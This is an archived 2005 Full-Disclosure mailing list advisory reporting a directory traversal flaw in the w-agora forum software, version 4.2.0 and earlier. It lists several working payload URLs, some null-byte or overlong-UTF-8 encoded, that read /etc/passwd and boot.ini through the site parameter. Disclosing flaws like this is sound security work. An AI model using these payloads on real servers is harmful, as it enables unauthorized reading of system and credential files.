From: h4cky0u (h4cky0u.orggmail.com)
Date: Thu Aug 18 2005 - 07:00:44 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

w-agora 4.2.0 and prior Remote Directory Travel Vulnerability

SEVERITY:
=========
High

SOFTWARE:
=========
w-agora 4.2.0

http://w-agora.net

INFO:
=====
w-agora is a web publishing and forum software. It allows you and your
visitors to store and display messages, files, share discussions and
other information on your web site.

DESCRIPTION:
============
W-agora 4.2.0 and earlier are vulnerable to a remote directory travel bug.

Here are some examples:

http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini%00

http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd%00

http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd

http://localhost/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini

http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini

A proof of concept video supporting this issue can be downloaded from here -

http://rapidshare.de/files/4106113/probe.rar.html

VENDOR STATUS
=============
Vendor was contacted but no response received till date.

CREDITS:
========
This vulnerability was discovered and researched by -

matrix_killer of h4cky0u Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org

Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!

ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=2097

--
http://www.h4cky0u.org
(In)Security at its best...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]